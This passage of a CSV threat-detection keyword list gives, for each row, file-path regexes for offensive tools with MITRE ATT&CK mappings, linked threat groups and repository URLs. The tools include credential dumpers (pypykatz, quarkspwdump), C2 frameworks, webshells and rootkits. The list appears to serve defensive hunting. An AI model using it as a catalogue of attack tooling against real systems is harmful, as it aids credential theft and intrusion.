TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10078" "*/Pyobfpremium*",".{0,1000}\/Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10079" "*/Pyobftoexe*",".{0,1000}\/Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10080" "*/Pyobfuse*",".{0,1000}\/Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10081" "*/Pyobfusfile*",".{0,1000}\/Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10082" "*/pypi.org/project/GraphSpy*",".{0,1000}\/pypi\.org\/project\/GraphSpy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - 
TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","10086" "*/pypykatz*",".{0,1000}\/pypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","10087" "*/pypykatz.py*",".{0,1000}\/pypykatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","10088" "*/Pyramid.git*",".{0,1000}\/Pyramid\.git.{0,1000}","offensive_tool_keyword","Pyramid","a 
tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","10089" "*/pyramid.py*",".{0,1000}\/pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","10090" "*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10091" "*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10092" "*/pyrdp:latest*",".{0,1000}\/pyrdp\:latest.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a 
honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10093" "*/pyrdp_mitm-*",".{0,1000}\/pyrdp_mitm\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10094" "*/pysecdump.git*",".{0,1000}\/pysecdump\.git.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","10095" "*/pysnaffler.git*",".{0,1000}\/pysnaffler\.git.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","10097" "*/Pysoserial.git*",".{0,1000}\/Pysoserial\.git.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","10098" "*/pysoxy.git*",".{0,1000}\/pysoxy\.git.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","10099" "*/pysoxy.py*",".{0,1000}\/pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","10100" "*/PySQLRecon.git*",".{0,1000}\/PySQLRecon\.git.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","10101" "*/PySQLRecon/tarball*",".{0,1000}\/PySQLRecon\/tarball.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - 
T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","10102" "*/PySQLRecon/zipball*",".{0,1000}\/PySQLRecon\/zipball.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","10103" "*/pystinger.zip*",".{0,1000}\/pystinger\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","10104" "*/Python-dynload-os.h*",".{0,1000}\/Python\-dynload\-os\.h.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10105" "*/pythonmemorymodule.py*",".{0,1000}\/pythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#linux","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","10106" "*/Python-Rootkit.git*",".{0,1000}\/Python\-Rootkit\.git.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which 
will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","10107" "*/pywerview*",".{0,1000}\/pywerview.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","10108" "*/pywhisker.git*",".{0,1000}\/pywhisker\.git.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","10109" "*/pywsus.git*",".{0,1000}\/pywsus\.git.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","1","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","10110" "*/pywsus.py*",".{0,1000}\/pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10111" "*/pywsus-master.zip*",".{0,1000}\/pywsus\-master\.zip.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","1","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","10112" "*/qakbot.profile*",".{0,1000}\/qakbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10113" "*/qconn-exec.nse*",".{0,1000}\/qconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10114" "*/QHpix/CVE-2021-44521*",".{0,1000}\/QHpix\/CVE\-2021\-44521.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z","10115" "*/qscan.nse*",".{0,1000}\/qscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10117" "*/quake1-info.nse*",".{0,1000}\/quake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10118" "*/quake3-info.nse*",".{0,1000}\/quake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10119" "*/quake3-master-getservers.nse*",".{0,1000}\/quake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10120" "*/quantloader.profile*",".{0,1000}\/quantloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10121" "*/quarkspwdump.git*",".{0,1000}\/quarkspwdump\.git.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","10122" "*/quarkspwdump.git*",".{0,1000}\/quarkspwdump\.git.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","1","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","10123" "*/Quasar.exe*",".{0,1000}\/Quasar\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10124" "*/quic-go/quic-go/http3*",".{0,1000}\/quic\-go\/quic\-go\/http3.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","10128" "*/quickcrack.py*",".{0,1000}\/quickcrack\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging 
SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","10131" "*/QuickViewAD.ps1*",".{0,1000}\/QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","10132" "*/quicserver.exe*",".{0,1000}\/quicserver\.exe.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","10133" "*/quiet-riot.git*",".{0,1000}\/quiet\-riot\.git.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10134" "*/r00t-3xp10it*",".{0,1000}\/r00t\-3xp10it.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","10135" "*/r57shell.php*",".{0,1000}\/r57shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10136" "*/r57shell127.php*",".{0,1000}\/r57shell127\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10137" "*/r77-rootkit.git*",".{0,1000}\/r77\-rootkit\.git.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","10138" "*/r77-x64.dll*",".{0,1000}\/r77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","10139" "*/r77-x86.dll*",".{0,1000}\/r77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","10140" 
